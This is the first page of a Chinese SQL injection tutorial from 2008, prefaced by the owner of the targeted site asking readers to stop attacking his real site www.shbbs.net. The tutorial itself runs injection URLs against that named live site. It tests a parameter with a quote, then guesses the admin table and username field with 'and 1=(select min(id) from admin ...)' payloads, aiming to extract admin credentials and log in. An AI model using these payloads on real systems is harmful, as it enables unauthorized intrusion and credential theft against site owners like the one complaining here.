WEB开发网
开发学院网络安全黑客技术 给大家发一个SQL注入实战教程吧 阅读

给大家发一个SQL注入实战教程吧

 2008-10-27 16:51:38 来源:WEB开发网   
核心提示:这篇文章是去年10月份发的,我今年3月份才发现,给大家发一个SQL注入实战教程吧,这么长时间以来我的网站www.shbbs.net一直被当作教程攻击,呵呵,请大家不要破坏~~打开 http://www.shbbs.net/Article/list.asp?id=974在 http://www.shbbs.net/Art

这篇文章是去年10月份发的,我今年3月份才发现,这么长时间以来我的网站www.shbbs.net一直被当作教程攻

击,呵呵,晕死。直到有一个好心网友提醒我我才做了一些处理。

大家不要再按教程上直接使用攻击我的网站www.shbbs.net了,呵呵我已经打了预防针了:)找别人的去演习吧

:)

以下是文章部分,还有动画教程,呵呵,晕死:)

实战 SQL Injection

目标:www.shbbs.net 的文章发布系统~~

目的:为了演示SQL Injection 给新手看,请大家不要破坏~~

打开 http://www.shbbs.net/Article/list.asp?id=974

在 http://www.shbbs.net/Article/list.asp?id=974 后加个 '

http://www.shbbs.net/Article/list.asp?id=974'

出错!ID没有过滤.

好。现在步骤就是

1、猜管理员账号的表

2、猜相应表中的用户的字段名以及密码的字段名.

3、猜出用户名的长度和密码的长度.

3、猜出用户名和密码

4、找到管理界面进去登陆管理.

猜管理员表:

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin) '//min(id) 返回表

中ID最小的值.

返回文章,证明有一个admin的表.如果没有返回文章,证明出错!不存在admin这个表.

猜用户的字段名

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where user='qqq')

返回错误信息,表示没有user这个用户字段名

再来~~

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

username='qqq')

1 2 3  下一页

Tags:大家 一个 SQL

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接